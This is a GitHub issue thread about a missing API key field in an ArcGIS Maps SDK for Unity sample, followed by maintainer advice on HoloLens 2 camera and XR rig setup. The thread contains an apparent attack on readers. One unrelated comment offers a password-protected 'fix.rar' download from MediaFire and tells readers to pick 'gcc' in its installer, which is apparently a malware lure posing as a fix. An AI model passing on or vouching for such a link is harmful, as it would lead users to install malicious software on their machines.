### ISSUE TITLE
SampleSwitcher does not expose a field for API key

### ISSUE THREAD

**Issue by BillWinston** [Esri/arcgis-maps-sdk-unity-samples#134]
I'm following the instructions on the ReadMe page and in step 7, am asked to use the SampleSwitcher game object to enter my API key in the Inspector but there is no field for this.  Please advise.

![image](https://github.com/user-attachments/assets/2398c929-e030-4aa8-908b-a53e46256bb2)

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmgaw113** [comment]
We apologize for the confusion. The sample switcher has been updated and uses a different method for setting the API key. You can either set it in project settings (Tools> ArcGISMaps SDK > Project Settings), or if you click play with in the sample switcher level, it will prompt you to enter an API Key within the Sample Switcher UI. 

We will update the documentation to make this more clear.
Thanks for the feedback and understanding,
Mason

**Comment by BillWinston** [comment]
Thanks Mason, I'll use that method.  By the way, I have only noticed a few entries regarding porting ArcGIS SDK apps to the Hololens.  This is our main device for 3D data display and I would like to connect with anyone who has successfully developed apps in Unity for it.  Are you aware of anyone?

Regards,
Bill

________________________________

**Comment by arash-sh** [comment]
Hello Bill, I am not aware of anybody building the sample project for Hololens, but our plugin does support Hololens 2.

The Microsoft guides for developing Hololens apps with Unity can be found [here](https://learn.microsoft.com/en-us/windows/mixed-reality/develop/unity/unity-development-overview?tabs=arr%2CD365%2Chl2) and [here](https://learn.microsoft.com/en-us/windows/mixed-reality/develop/unity/build-and-deploy-to-hololens).

A few tips related to using our plugin on Hololens:

- Unless you intend to use offline data only, make sure Internet Client is enabled under Player Settings > Publishing Settings > Capabilities. For offline data, make sure to the local files are stored on the headset under a path accessible through Unity (e.g., streaming assets folder).
- You will use a XR rig + camera to capture the scene for Holelens. Additionally, you will need an `ArcGISCamera` game object in your scene. Remove the camera component from `ArcGISCamera` to avoid interference with the main (XR) camera. Set the FOV and Viewport values for `ArcGISCamera` component of `ArcGISCamera` game object to appropriate values. And If not already present, add an ArcGISLocation component to `ArcGISCamera`.    
- The `ArcGISCamera` is used to determine the content that needs to be loaded at runtime and the respective LoDs, so place it at a location and orientation that faces the map game object. E.g., it may be placed above the regular camera (for 1st person view) or above the map game object (for tabletop view). Setting the rotation of `ArcGISLocation` component to (0,0,0) ensures that the camera is pointing the the map.

**Comment by BillWinston** [comment]
Thanks for these tips Arash, this is VERY helpful!
I am a bit confused about hierarchy.  Should the XR Rig be a child of the ArcGISMap game object or at the same level?  And does the ArcGISCamera object (once I remove the Camera component) become a child of the XR Rig?

I did try the configuration shown below but am getting an error that the ArcGISCamera component does not have a camera attached.  I must have something out of order in the hierarchy.

[cid:33b87ca8-c130-4afe-aa93-1da0a130e633]

________________________________

**Comment by arash-sh** [comment]
Your configuration doesn't show up, but the XR rig and the ArcGISMap GO can be at the same level. ArcGISCamera GO needs to be attached to ArcGIS map, and it should have an ArcGISCamera component and an ArcGISLocation component, but it shouldn't require a "regular" camera component. Here is a configuration that has worked for me before. 
![image](https://github.com/user-attachments/assets/2e1386f4-915c-4230-aa25-951f4107f674)
 In this setup I have placed the ArcGISCamera above origin. If you want this camera to be attached to the main camera, you may need the ArcGISMap GO to be parent to XR rig and the ArcGISCamera child to main camera, but I have not tested this setup.

**Comment by mmgaw113** [comment]
@BillWinston I am going to close this issue as it is related to the bug for the API key we fixed this morning. Please feel free to open a new issue for the Hololens problems you are running into.

**Comment by BillWinston** [comment]
Hi Arash,
I've been distracted by another project for a while but am finally returning to my effort to port the ArcGIS SDK Map Creator UI tutorial onto our Hololens2 device.  Are you able to provide some advice on this?  If so, I will send more information, otherwise, could you steer me towards someone who could help?

Thanks!

Bill


________________________________

**Comment by BillWinston** [comment]
Thanks Arash, I appreciate the response and am working on the issue today.  I'm already making progress based on your suggestions and I will update the issue there once I get some results.

Cheers...Bill

________________________________
